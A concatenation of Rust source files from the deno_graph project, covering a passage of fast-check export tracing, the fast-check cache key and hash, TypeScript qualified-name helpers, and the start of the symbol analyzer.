Some(package)
}
fn is_cache_item_valid(&self, cache_item: &FastCheckCacheItem) -> bool {
for (specifier, module_item) in &cache_item.modules {
let hash = self
.graph
.get(specifier)
.and_then(|m| m.source())
.map(|s| fast_insecure_hash(s.as_bytes()))
.unwrap_or(0);
if hash != module_item.source_hash() {
return false;
}
}
true
}
fn add_pending_trace(
&mut self,
nv: &PackageNv,
specifier: &ModuleSpecifier,
trace: ImportedExports,
) {
if let Some(trace) = self.traced_exports.add(specifier, trace) {
self
.pending_traces
.add(nv.clone(), specifier.clone(), trace);
}
}
fn add_pending_nv(&mut self, dep: &PackageNv, referrer_nv: &PackageNv) {
if dep == referrer_nv {
return;
}
// when a package is referenced then we need to analyze
// all the dependencies for it in the graph
let is_new_dep = self
.public_ranges
.entry(referrer_nv.clone())
.or_default()
.dependencies
.insert(dep.clone());
// if it's not a new dep then we've been here before
// so no reason to attempt this again
if is_new_dep {
self.add_pending_nv_no_referrer(dep);
}
}
fn add_pending_nv_no_referrer(&mut self, nv: &PackageNv) {
let never_seen = self.seen_nvs.insert(nv.clone());
if never_seen {
self.pending_nvs.push_back(nv.clone());
}
}
fn analyze_trace(&mut self, trace: &PendingTrace) {
log::trace!("Trace - {} - {:?}", trace.specifier, trace.exports_to_trace);
let Some(module) = self.graph.get(&trace.specifier) else {
return;
};
if is_module_typed(module) {
if let Some(module_info) =
self.root_symbol.module_from_specifier(&trace.specifier)
{
self.analyze_module_info(trace, module_info);
}
} else if !is_module_external(module) {
let ranges = self
.public_ranges
.entry(trace.package_nv.clone())
.or_default()
.module_ranges
.entry(trace.specifier.clone())
.or_default();
// if there are any diagnostics present then that means
// we already inserted this diagnostic, so we can ignore
// doing it again
if ranges.diagnostics.is_empty() {
ranges.diagnostics.push(
FastCheckDiagnostic::UnsupportedNestedJavaScript {
specifier: trace.specifier.clone(),
},
);
}
}
}
fn analyze_module_info(
&mut self,
trace: &PendingTrace,
module_info: ModuleInfoRef<'a>,
) -> bool {
#[derive(Debug)]
enum PendingIdTrace {
Id {
symbol_id: SymbolId,
referrer_id: SymbolId,
},
QualifiedId {
symbol_id: SymbolId,
parts: NamedSubset,
referrer_id: SymbolId,
},
}
#[derive(Default)]
struct PendingTraces {
traces: VecDeque<PendingIdTrace>,
done_id_traces: HashSet<SymbolId>,
}
impl PendingTraces {
fn maybe_add_id_trace(
&mut self,
symbol_id: SymbolId,
referrer_id: SymbolId,
) {
// the referrer_id is only used for diagnostic purposes and we only
// care about the first diagnostic, so we can only take the symbol_id
// into account when checking if we should trace this
if self.done_id_traces.insert(symbol_id) {
self.traces.push_back(PendingIdTrace::Id {
symbol_id,
referrer_id,
});
}
}
}
let pkg_nv = &trace.package_nv;
let mut found_ranges = HashSet::new();
let mut impl_with_overload_ranges = HashSet::new();
let mut found = false;
let mut diagnostics = Vec::new();
let mut pending_traces = PendingTraces::default();
let module_symbol = module_info.module_symbol();
let include_default =
matches!(trace.exports_to_trace, ImportedExports::StarWithDefault);
match &trace.exports_to_trace {
ImportedExports::Star | ImportedExports::StarWithDefault => {
for (name, export_symbol_id) in module_info.module_symbol().exports() {
if name == "default" && !include_default {
continue;
}
pending_traces
.maybe_add_id_trace(*export_symbol_id, module_symbol.symbol_id());
}
// add all the specifiers to the list of pending specifiers
if let Some(re_export_all_nodes) = module_info.re_export_all_nodes() {
for re_export_all_node in re_export_all_nodes {
log::trace!(
"Found re-export all - {}",
re_export_all_node.src.value.to_string_lossy()
);
found_ranges.insert(re_export_all_node.span.range());
let specifier_text = re_export_all_node.src.value.to_string_lossy();
if let Some(dep_specifier) = self.graph.resolve_dependency(
&specifier_text,
module_info.specifier(),
/* prefer types */ true,
) {
// only analyze registry specifiers
if let Some(dep_nv) =
self.url_converter.registry_package_url_to_nv(dep_specifier)
{
self.add_pending_nv(&dep_nv, pkg_nv);
self.add_pending_trace(
&dep_nv,
dep_specifier,
ImportedExports::star(),
);
}
}
}
}
found = true;
}
ImportedExports::Subset(named_exports) => {
let mut named_exports = named_exports.0.clone();
let module_exports = module_info.module_symbol().exports();
for i in (0..named_exports.len()).rev() {
let (export_name, _) = named_exports.get_index(i).unwrap();
if let Some(export_symbol_id) = module_exports.get(export_name) {
let export_name = export_name.clone();
let named_exports =
named_exports.swap_remove(&export_name).unwrap();
match named_exports {
Exports::All => {
pending_traces.maybe_add_id_trace(
*export_symbol_id,
module_symbol.symbol_id(),
);
}
Exports::Subset(subset) => {
pending_traces
.traces
.push_back(PendingIdTrace::QualifiedId {
symbol_id: *export_symbol_id,
parts: subset,
referrer_id: module_symbol.symbol_id(),
});
}
}
}
}
if !named_exports.is_empty()
&& let Some(re_export_all_nodes) = module_info.re_export_all_nodes()
{
for re_export_all_node in re_export_all_nodes {
if named_exports.is_empty() {
break; // all done
}
let specifier_text = re_export_all_node.src.value.to_string_lossy();
if let Some(dep_specifier) = self.graph.resolve_dependency(
&specifier_text,
module_info.specifier(),
/* prefer types */ true,
) && let Some(module_info) =
self.root_symbol.module_from_specifier(dep_specifier)
{
let module_exports = module_info.exports(self.root_symbol);
for i in (0..named_exports.len()).rev() {
let (export_name, _) = named_exports.get_index(i).unwrap();
if let Some(export_path) =
module_exports.resolved.get(export_name)
{
if found_ranges.insert(re_export_all_node.span.range()) {
log::trace!(
"Found re-export all - {}",
re_export_all_node.src.value.to_string_lossy()
);
}
let export_name = export_name.clone();
let named_exports =
named_exports.swap_remove(&export_name).unwrap();
let module = match export_path {
ResolvedExportOrReExportAllPath::Export(e) => e.module,
ResolvedExportOrReExportAllPath::ReExportAllPath(p) => {
p.referrer_module
}
};
if let Some(nv) = self
.url_converter
.registry_package_url_to_nv(module.specifier())
{
let mut new_named_exports = NamedSubset::default();
new_named_exports.0.insert(export_name, named_exports);
self.add_pending_trace(
&nv,
module.specifier(),
ImportedExports::subset(new_named_exports),
);
}
}
}
}
}
if !named_exports.is_empty() {
// in this case, include all re_export all ranges because
// we couldn't determine a named export
if let Some(re_export_all_nodes) = module_info.re_export_all_nodes()
{
for re_export_all_node in re_export_all_nodes {
log::trace!(
"Found re-export all - {}",
re_export_all_node.src.value.to_string_lossy()
);
found_ranges.insert(re_export_all_node.span.range());
}
}
}
}
}
}
while let Some(trace) = pending_traces.traces.pop_front() {
match trace {
PendingIdTrace::Id {
symbol_id,
referrer_id: trace_referrer_id,
} => {
let symbol = module_info.symbol(symbol_id).unwrap();
if symbol.is_private_member() {
if Some(trace_referrer_id) != symbol.parent_id() {
diagnostics.push(
FastCheckDiagnostic::UnsupportedPrivateMemberReference {
range: FastCheckDiagnosticRange {
specifier: module_info.specifier().clone(),
range: symbol.decls()[0].range,
text_info: module_info.text_info().clone(),
},
name: module_info
.fully_qualified_symbol_name(symbol)
.unwrap_or_else(|| "<unknown>".to_string()),
referrer: module_info
.symbol(trace_referrer_id)
.and_then(|symbol| {
module_info.fully_qualified_symbol_name(symbol)
})
.unwrap_or_else(|| "<unknown>".to_string()),
},
);
}
continue;
}
for decl in symbol.decls() {
log::trace!(
"Found decl - {}",
decl.maybe_name().unwrap_or(Cow::Borrowed("<no-name>"))
);
found_ranges.insert(decl.range);
if decl.has_overloads() && decl.has_body() {
impl_with_overload_ranges.insert(decl.range);
continue;
}
let referrer_id = symbol_id;
match &decl.kind {
SymbolDeclKind::Target(id) => {
if let Some(symbol_id) =
module_info.esm().and_then(|m| m.symbol_id_from_swc(id))
{
pending_traces.maybe_add_id_trace(symbol_id, referrer_id);
}
}
SymbolDeclKind::QualifiedTarget(id, parts) => {
if let Some(symbol_id) =
module_info.esm().and_then(|m| m.symbol_id_from_swc(id))
{
pending_traces.traces.push_back(
PendingIdTrace::QualifiedId {
symbol_id,
parts: NamedSubset::from_parts(parts),
referrer_id,
},
);
}
}
SymbolDeclKind::FileRef(file_dep) => {
if let Some(specifier) = self.graph.resolve_dependency(
&file_dep.specifier,
module_info.specifier(),
/* prefer types */ true,
) && let Some(dep_nv) =
self.url_converter.registry_package_url_to_nv(specifier)
{
if dep_nv == *pkg_nv {
// just add this specifier
self.add_pending_trace(
&dep_nv,
specifier,
ImportedExports::from_file_dep_name(&file_dep.name),
);
} else {
// need to analyze the whole package
self.add_pending_nv(&dep_nv, pkg_nv);
}
}
}
SymbolDeclKind::Definition(node) => {
if let Some(node) = node.maybe_ref() {
// if the node is a class or interface member, ensure its parent is traced
if node.is_member()
&& let Some(parent_id) = symbol.parent_id()
{
// don't add the parent if we analyzed this node from the parent
if trace_referrer_id != parent_id {
pending_traces.maybe_add_id_trace(parent_id, referrer_id);
}
}
// functions may contain expando property exports that are
// outside the range of the function, so include those as
// part of the found ranges
if node.is_function() {
for export_id in symbol.exports().values() {
let export_symbol =
module_info.symbol(*export_id).unwrap();
for export_decl in export_symbol.decls() {
if !decl.range.contains(&export_decl.range) {
log::trace!(
"Found expando property - {}",
export_decl
.maybe_name()
.unwrap_or(Cow::Borrowed("<no-name>"))
);
found_ranges.insert(export_decl.range);
}
}
}
}
for dep in node.deps(ResolveDepsMode::TypesAndExpressions) {
match dep {
SymbolNodeDep::Id(id) => {
let module_info = module_info.esm().unwrap();
if let Some(symbol_id) =
module_info.symbol_id_from_swc(&id)
{
pending_traces
.maybe_add_id_trace(symbol_id, referrer_id);
}
}
SymbolNodeDep::QualifiedId(id, parts) => {
let module_info = module_info.esm().unwrap();
if let Some(symbol_id) =
module_info.symbol_id_from_swc(&id)
{
pending_traces.traces.push_back(
PendingIdTrace::QualifiedId {
symbol_id,
parts: NamedSubset::from_parts(&parts),
referrer_id,
},
);
}
}
SymbolNodeDep::ImportType(specifier, parts) => {
if let Some(specifier) = self.graph.resolve_dependency(
&specifier,
module_info.specifier(),
/* prefer types */ true,
) && let Some(dep_nv) = self
.url_converter
.registry_package_url_to_nv(specifier)
{
if dep_nv == *pkg_nv {
// just add this specifier
self.add_pending_trace(
&dep_nv,
specifier,
if parts.is_empty() {
ImportedExports::star_with_default()
} else {
ImportedExports::subset(
NamedSubset::from_parts(&parts),
)
},
);
} else {
// need to analyze the whole package
self.add_pending_nv(&dep_nv, pkg_nv);
}
}
}
}
}
}
}
}
}
pending_traces.traces.extend(
symbol
.exports()
.values()
.map(|id| (*id, symbol.symbol_id()))
.chain(
symbol.members().iter().map(|id| (*id, symbol.symbol_id())),
)
.filter(|(symbol_id, _referrer_id)| {
!pending_traces.done_id_traces.contains(symbol_id)
})
.map(|(symbol_id, referrer_id)| PendingIdTrace::Id {
symbol_id,
referrer_id,
}),
);
}
PendingIdTrace::QualifiedId {
symbol_id,
parts,
referrer_id,
} => {
let symbol = module_info.symbol(symbol_id).unwrap();
let mut handled = false;
for decl in symbol.decls() {
log::trace!(
"Found decl - {}",
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/cache.rs | src/fast_check/cache.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::BTreeSet;
use std::sync::Arc;
use deno_semver::package::PackageNv;
use serde::Deserialize;
use serde::Serialize;
use crate::ModuleSpecifier;
/// Cache key that's a hash of the package name, version, and
/// sorted export names.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd)]
pub struct FastCheckCacheKey(u64);
impl FastCheckCacheKey {
#[cfg(feature = "fast_check")]
pub fn build(
hash_seed: &'static str,
package_nv: &PackageNv,
entrypoints: &BTreeSet<ModuleSpecifier>,
) -> Self {
use std::hash::Hash;
use std::hash::Hasher;
let mut hasher = twox_hash::XxHash64::default();
hash_seed.hash(&mut hasher);
package_nv.hash(&mut hasher);
for value in entrypoints {
value.hash(&mut hasher);
}
Self(hasher.finish())
}
pub fn as_u64(&self) -> u64 {
self.0
}
}
// On successful fast check, The value in the hash is a list of files
// used, these files' hashes, and the package's dependencies that are
// used in fast check (not any deps that aren't). The cache is invalidated
// when any of these files change.
//
// On failure, the value in the hash is the entrypoint files along with
// any imported file until a diagnostic is found. These hashes are stored
// so that the cache can be invalidated when any of them change.
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct FastCheckCacheItem {
pub dependencies: BTreeSet<PackageNv>, // ordered for determinism when deserializing
pub modules: Vec<(ModuleSpecifier, FastCheckCacheModuleItem)>,
}
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub enum FastCheckCacheModuleItem {
Info(FastCheckCacheModuleItemInfo),
Diagnostic(FastCheckCacheModuleItemDiagnostic),
}
impl FastCheckCacheModuleItem {
pub fn source_hash(&self) -> u64 {
match self {
FastCheckCacheModuleItem::Info(info) => info.source_hash,
FastCheckCacheModuleItem::Diagnostic(diagnostic) => {
diagnostic.source_hash
}
}
}
}
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct FastCheckCacheModuleItemInfo {
pub source_hash: u64,
/// Serialized module_info as JSON because bincode (used in the CLI's cache)
/// doesn't work well with the ModuleInfo since it makes heavy use of
/// skip_serializing_if.
pub module_info: String,
pub text: Arc<str>,
pub source_map: Arc<str>,
}
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct FastCheckCacheModuleItemDiagnostic {
pub source_hash: u64,
}
/// Cache for storing the results of fast checks based on a package.
pub trait FastCheckCache {
/// Seed that is provided to the hash in order to cache bust
/// it on version changes.
///
/// This defaults to the current deno_graph version.
fn hash_seed(&self) -> &'static str {
env!("CARGO_PKG_VERSION")
}
fn get(&self, key: FastCheckCacheKey) -> Option<FastCheckCacheItem>;
fn set(&self, key: FastCheckCacheKey, value: FastCheckCacheItem);
}
#[cfg(feature = "fast_check")]
pub(crate) fn fast_insecure_hash(bytes: &[u8]) -> u64 {
use std::hash::Hash;
use std::hash::Hasher;
let mut hasher = twox_hash::XxHash64::default();
bytes.hash(&mut hasher);
hasher.finish()
}
#[cfg(test)]
mod test {
#[test]
fn module_item_info_serialization() {
let item = super::FastCheckCacheModuleItem::Info(
super::FastCheckCacheModuleItemInfo {
source_hash: 0,
module_info: Default::default(),
text: "test".to_string().into(),
source_map: "012".to_string().into(),
},
);
let data = bincode::serialize(&item).unwrap();
let result = bincode::deserialize(&data).unwrap();
assert_eq!(item, result);
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/swc_helpers.rs | src/symbols/swc_helpers.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use deno_ast::swc::ast::Id;
use deno_ast::swc::ast::TsEntityName;
use deno_ast::swc::ast::TsQualifiedName;
pub fn ts_entity_name_to_parts(
entity_name: &TsEntityName,
) -> (Id, Vec<String>) {
match entity_name {
TsEntityName::TsQualifiedName(qualified_name) => {
ts_qualified_name_parts(qualified_name)
}
TsEntityName::Ident(ident) => (ident.to_id(), Vec::new()),
}
}
pub fn ts_qualified_name_parts(
mut qualified_name: &TsQualifiedName,
) -> (Id, Vec<String>) {
let mut parts = Vec::new();
loop {
parts.push(qualified_name.right.sym.to_string());
match &qualified_name.left {
TsEntityName::TsQualifiedName(n) => {
qualified_name = n;
}
TsEntityName::Ident(n) => {
parts.reverse();
return (n.to_id(), parts);
}
}
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/analyzer.rs | src/symbols/analyzer.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::cell::Cell;
use std::cell::Ref;
use std::cell::RefCell;
use std::hash::Hash;
use deno_ast::MediaType;
use deno_ast::ModuleSpecifier;
use deno_ast::ParsedSource;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::SourceTextInfo;
use deno_ast::swc::ast::*;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::utils::find_pat_ids;
use deno_ast::swc::utils::is_valid_ident;
use indexmap::IndexMap;
use indexmap::IndexSet;
use crate::JsModule;
use crate::JsonModule;
use crate::ModuleGraph;
use crate::ast::EsParser;
use crate::ast::ParseOptions;
use crate::graph::WasmModule;
use super::ResolvedSymbolDepEntry;
use super::SymbolNodeDep;
use super::collections::AdditiveOnlyIndexMap;
use super::collections::AdditiveOnlyIndexMapForCopyValues;
use super::collections::AdditiveOnlyMap;
use super::collections::AdditiveOnlyMapForCopyValues;
use super::cross_module;
use super::cross_module::Definition;
use super::cross_module::DefinitionOrUnresolved;
use super::cross_module::DefinitionPathNode;
use super::cross_module::ModuleExports;
use super::dep_analyzer::ResolveDepsMode;
use super::swc_helpers::ts_entity_name_to_parts;
/// The root symbol from which module symbols can be retrieved.
///
/// Building the symbols for modules is lazy.
pub struct RootSymbol<'a> {
module_graph: &'a ModuleGraph,
parser: &'a dyn EsParser,
specifiers_to_ids: AdditiveOnlyMapForCopyValues<ModuleSpecifier, ModuleId>,
ids_to_modules: AdditiveOnlyMap<ModuleId, ModuleInfo>,
}
impl<'a> RootSymbol<'a> {
pub fn new(module_graph: &'a ModuleGraph, parser: &'a dyn EsParser) -> Self {
Self {
module_graph,
parser,
specifiers_to_ids: Default::default(),
ids_to_modules: Default::default(),
}
}
/// Checks if a specifier has been analyzed before.
///
/// This does not lazily analyze the module.
pub fn has_analyzed(&self, specifier: &ModuleSpecifier) -> bool {
self.specifiers_to_ids.contains_key(specifier)
}
/// Gets a module from the provided specifier. This will lazily analyze
/// the module if it has not already been analyzed.
pub fn module_from_specifier(
&self,
specifier: &ModuleSpecifier,
) -> Option<ModuleInfoRef<'_>> {
if let Some(module_id) = self.specifiers_to_ids.get(specifier) {
let module_symbol = self.ids_to_modules.get(&module_id).unwrap();
return Some(module_symbol.as_ref());
}
let graph_module = self.module_graph.get(specifier)?;
match graph_module {
crate::Module::Js(js_module) => js_module
.maybe_types_dependency
.as_ref()
.and_then(|types| {
types.dependency.maybe_specifier().and_then(|specifier| {
// shouldn't happen, but prevent circular loops
if specifier != &js_module.specifier {
self.module_from_specifier(specifier)
} else {
None
}
})
})
.or_else(|| self.analyze_js_module(js_module)),
crate::Module::Json(json_module) => {
Some(self.analyze_json_module(json_module))
}
crate::Module::Wasm(wasm_module) => self.analyze_wasm_module(wasm_module),
crate::Module::Npm(_)
| crate::Module::Node(_)
| crate::Module::External(_) => None,
}
}
pub fn module_from_id(
&self,
module_id: ModuleId,
) -> Option<ModuleInfoRef<'_>> {
self.ids_to_modules.get(&module_id).map(|s| s.as_ref())
}
/// Goes to the definitions of the specified symbol.
pub fn go_to_definitions<'b>(
&'b self,
module: ModuleInfoRef<'b>,
symbol: &'b Symbol,
) -> impl Iterator<Item = Definition<'b>> {
self
.find_definition_paths(module, symbol)
.into_iter()
.flat_map(|d| d.into_definitions())
}
/// Goes to the definitions of the specified symbol.
pub fn go_to_definitions_or_unresolveds<'b>(
&'b self,
module: ModuleInfoRef<'b>,
symbol: &'b Symbol,
) -> impl Iterator<Item = DefinitionOrUnresolved<'b>> {
self
.find_definition_paths(module, symbol)
.into_iter()
.flat_map(|d| d.into_definitions_or_unresolveds())
}
/// Finds the graph paths to the definition of the specified symbol.
pub fn find_definition_paths<'b>(
&'b self,
module: ModuleInfoRef<'b>,
symbol: &'b Symbol,
) -> Vec<DefinitionPathNode<'b>> {
debug_assert_eq!(symbol.module_id(), module.module_id());
super::cross_module::find_definition_paths(
self.module_graph,
module,
symbol,
&|specifier| self.module_from_specifier(specifier),
)
}
pub fn resolve_symbol_dep<'b>(
&'b self,
module: ModuleInfoRef<'b>,
dep: &SymbolNodeDep,
) -> Vec<ResolvedSymbolDepEntry<'b>> {
super::cross_module::resolve_symbol_dep(
self.module_graph,
module,
dep,
&|specifier| self.module_from_specifier(specifier),
)
}
fn analyze_js_module(
&self,
script_module: &JsModule,
) -> Option<ModuleInfoRef<'_>> {
let Ok(source) = self.parsed_source(script_module) else {
return None;
};
Some(self.build_raw_es_module_info(&script_module.specifier, &source))
}
fn analyze_json_module(&self, json_module: &JsonModule) -> ModuleInfoRef<'_> {
let specifier = &json_module.specifier;
// it's not ideal having to use SourceTextInfo here, but it makes
// it easier to interop with ParsedSource
let source_text_info = SourceTextInfo::new(json_module.source.text.clone());
let range = source_text_info.range();
let module_id = ModuleId(self.ids_to_modules.len() as u32);
let decls = {
let range = {
let source = source_text_info.text_str();
let start_whitespace_len = source.len() - source.trim_start().len();
let end_whitespace_len = source.len() - source.trim_end().len();
SourceRange::new(
range.start + start_whitespace_len,
range.end - end_whitespace_len,
)
};
Vec::from([SymbolDecl::new(
SymbolDeclKind::Definition(SymbolNode(SymbolNodeInner::Json)),
range,
)])
};
let module_symbol = JsonModuleInfo {
specifier: specifier.clone(),
module_id,
module_symbol: Symbol {
module_id,
symbol_id: SymbolId(0),
parent_id: None,
exports: IndexMap::from([("default".to_string(), SymbolId(1))]),
child_ids: IndexSet::from([SymbolId(1)]),
decls: decls.clone(),
members: Default::default(),
},
default_symbol: Symbol {
module_id,
symbol_id: SymbolId(1),
parent_id: Some(SymbolId(0)),
decls,
child_ids: Default::default(),
exports: Default::default(),
members: Default::default(),
},
source_text_info,
};
self.finalize_insert(ModuleInfo::Json(Box::new(module_symbol)))
}
fn analyze_wasm_module(
&self,
wasm_module: &WasmModule,
) -> Option<ModuleInfoRef<'_>> {
let maybe_parsed_source = self.parser.parse_program(ParseOptions {
specifier: &wasm_module.specifier,
source: wasm_module.source_dts.clone(),
media_type: MediaType::Dmts,
scope_analysis: true,
});
let Ok(source) = maybe_parsed_source else {
return None;
};
Some(self.build_raw_es_module_info(&wasm_module.specifier, &source))
}
fn build_raw_es_module_info(
&self,
specifier: &ModuleSpecifier,
source: &ParsedSource,
) -> ModuleInfoRef<'_> {
let program = source.program();
let module_id = ModuleId(self.ids_to_modules.len() as u32);
let builder = ModuleBuilder::new(module_id);
let filler = SymbolFiller {
source,
builder: &builder,
};
filler.fill(program.as_ref());
let module_symbol = EsModuleInfo {
specifier: specifier.clone(),
module_id,
source: source.clone(),
re_exports: builder.re_exports.take(),
swc_id_to_symbol_id: builder.swc_id_to_symbol_id.take(),
symbols: builder
.symbols
.take()
.into_iter()
.map(|(k, v)| (k, v.0.into_inner()))
.collect(),
};
self.finalize_insert(ModuleInfo::Esm(module_symbol))
}
fn finalize_insert(&self, module: ModuleInfo) -> ModuleInfoRef<'_> {
self
.specifiers_to_ids
.insert(module.specifier().clone(), module.module_id());
let module_id = module.module_id();
self.ids_to_modules.insert(module_id, module);
self.ids_to_modules.get(&module_id).unwrap().as_ref()
}
fn parsed_source(
&self,
graph_module: &JsModule,
) -> Result<ParsedSource, deno_ast::ParseDiagnostic> {
self.parser.parse_program(ParseOptions {
specifier: &graph_module.specifier,
source: graph_module.source.text.clone(),
media_type: graph_module.media_type,
scope_analysis: true,
})
}
}
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub enum FileDepName {
Star,
Name(String),
}
impl FileDepName {
pub fn maybe_name(&self) -> Option<&str> {
match self {
FileDepName::Name(name) => Some(name.as_str()),
FileDepName::Star => None,
}
}
}
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub struct FileDep {
pub name: FileDepName,
pub specifier: String,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Ord, PartialOrd)]
pub struct ModuleId(u32);
impl std::fmt::Display for ModuleId {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", self.0)
}
}
#[derive(Default, Copy, Clone, Eq, PartialEq, Hash, Ord, PartialOrd)]
pub struct SymbolId(u32);
impl std::fmt::Debug for SymbolId {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
// for less verbose debugging
write!(f, "{}", self.0)
}
}
#[derive(Clone)]
pub struct NodeRefBox<T> {
// the parsed source needs to be kept alive for the duration of the value
source: ParsedSource,
value: *const T,
}
impl<T> std::fmt::Debug for NodeRefBox<T> {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_struct("DeclRef")
.field("value", &"<omitted>")
.finish()
}
}
impl<T> NodeRefBox<T> {
/// WARNING: Ensure that T is a reference inside ParsedSource. Otherwise
/// this is entirely unsafe.
fn unsafe_new(parsed_source: &ParsedSource, value: &T) -> Self {
Self {
source: parsed_source.clone(),
value: value as *const _,
}
}
fn value(&self) -> &T {
// SAFETY: This is safe because the parsed source is kept alive for the
// duration of this struct and the reference is within the parsed source.
unsafe { &*self.value }
}
fn source(&self) -> &ParsedSource {
&self.source
}
}
#[derive(Clone)]
pub struct SymbolNode(SymbolNodeInner);
impl std::fmt::Debug for SymbolNode {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_tuple("SymbolNode")
.field(&match &self.0 {
SymbolNodeInner::Json => "<json>".to_string(),
SymbolNodeInner::Module(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ClassDecl(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ExportDecl(d, _) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ExportDefaultDecl(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ExportDefaultExpr(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::FnDecl(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsEnum(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsNamespace(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsTypeAlias(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsInterface(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::Var(d, _, ident) => {
format!(
"{}: {}",
ident.sym,
d.value().text_fast(d.source.text_info_lazy())
)
}
SymbolNodeInner::UsingVar(d, _, ident) => {
format!(
"{}: {}",
ident.sym,
d.value().text_fast(d.source.text_info_lazy())
)
}
SymbolNodeInner::AutoAccessor(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ClassMethod(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ClassProp(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ClassParamProp(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::Constructor(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::ExpandoProperty(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsIndexSignature(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsCallSignatureDecl(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsConstructSignatureDecl(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsPropertySignature(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsGetterSignature(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsSetterSignature(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
SymbolNodeInner::TsMethodSignature(d) => {
d.value().text_fast(d.source.text_info_lazy()).to_string()
}
})
.finish()
}
}
impl SymbolNode {
pub fn maybe_name(&self) -> Option<Cow<'_, str>> {
self.maybe_ref().and_then(|r| r.maybe_name())
}
pub fn maybe_ref(&self) -> Option<SymbolNodeRef<'_>> {
self.maybe_ref_and_source().map(|(n, _)| n)
}
pub fn maybe_ref_and_source(
&self,
) -> Option<(SymbolNodeRef<'_>, &ParsedSource)> {
match &self.0 {
SymbolNodeInner::Json => None,
SymbolNodeInner::Module(n) => {
Some((SymbolNodeRef::Module(n.value()), n.source()))
}
SymbolNodeInner::ClassDecl(n) => {
Some((SymbolNodeRef::ClassDecl(n.value()), n.source()))
}
SymbolNodeInner::ExportDecl(export_decl, inner) => Some((
SymbolNodeRef::ExportDecl(
export_decl.value(),
match inner {
SymbolNodeInnerExportDecl::Class(n) => {
ExportDeclRef::Class(n.value())
}
SymbolNodeInnerExportDecl::Fn(n) => ExportDeclRef::Fn(n.value()),
SymbolNodeInnerExportDecl::Var(decl, declarator, id) => {
ExportDeclRef::Var(decl.value(), declarator.value(), id)
}
SymbolNodeInnerExportDecl::TsEnum(n) => {
ExportDeclRef::TsEnum(n.value())
}
SymbolNodeInnerExportDecl::TsInterface(n) => {
ExportDeclRef::TsInterface(n.value())
}
SymbolNodeInnerExportDecl::TsNamespace(n) => {
ExportDeclRef::TsModule(n.value())
}
SymbolNodeInnerExportDecl::TsTypeAlias(n) => {
ExportDeclRef::TsTypeAlias(n.value())
}
},
),
export_decl.source(),
)),
SymbolNodeInner::ExportDefaultDecl(n) => {
Some((SymbolNodeRef::ExportDefaultDecl(n.value()), n.source()))
}
SymbolNodeInner::ExportDefaultExpr(n) => {
Some((SymbolNodeRef::ExportDefaultExpr(n.value()), n.source()))
}
SymbolNodeInner::FnDecl(n) => {
Some((SymbolNodeRef::FnDecl(n.value()), n.source()))
}
SymbolNodeInner::TsEnum(n) => {
Some((SymbolNodeRef::TsEnum(n.value()), n.source()))
}
SymbolNodeInner::TsNamespace(n) => {
Some((SymbolNodeRef::TsNamespace(n.value()), n.source()))
}
SymbolNodeInner::TsTypeAlias(n) => {
